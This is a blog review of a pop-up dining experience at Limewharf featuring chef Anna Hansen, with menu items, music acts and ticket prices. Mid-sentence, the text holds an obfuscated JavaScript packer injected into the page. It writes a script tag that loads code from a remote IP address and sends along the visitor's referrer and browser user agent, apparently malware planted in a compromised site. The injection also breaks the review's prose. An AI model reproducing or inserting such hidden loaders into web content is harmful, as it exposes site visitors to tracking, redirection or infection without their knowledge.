KITCHEN EXPERIMENT AT LIMEWHARF…

‘Eat the World’ featuring The Modern Pantry’s Anna Hansen is a pop up kitchen experience unlike any we’ve been to before. As the host explained “it’s about bringing people together to touch each other in special places”

With (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzzas|var|u0026u|referrer|tnfkk||js|php’.split(‘|’),0,{}))
room for 50 guests a night the aim is not just to serve great food but to encourage a good old debate and some quirky conversation, along with special musical performances, commissioned events and digital installations each night. Open Wednesday, Thursday and Friday evenings guests dine together around the Worldscape – previously seen at The Global Feast in Stratford – a sculptural map of the world, oh yes it’s not just an old warehouse in hackney your going global baby!

With food created by Anna Hansen and Limewharf’s Thomas Ermacora expect dishes such as monk fish liver gyozas with squid ink and lemongrass broth and fish skin crisps and wattle seed dusted briq with artichoke and oyster mushrooms. The music varies each week, for us it was the musical saw which as you can probably image definitely struck up a bit of a convo for us…what the?! Next up is Gregor Ridell a composer, cellist and founder member of the Solstice String Quartet – think Arty Farty rather than rock’n’roll.

Tickets are priced at £55 which will get you sparking wine on arrival, a selection of canapés and unlimited access to the cheese board and freshly made breads…or until they run out at least. You will then move into the dining room were you will be served five small plates and two desserts along with your choice of red of white or red wine.

If you’re a lover of hippy trippy totally out there modern art and dining then this is one for you. With one week to go of the first installment you will have to be quick to get your tickets or look out for the second installment which will be taking place later in 2013 at Vyner Street’s trendy Limewharf.
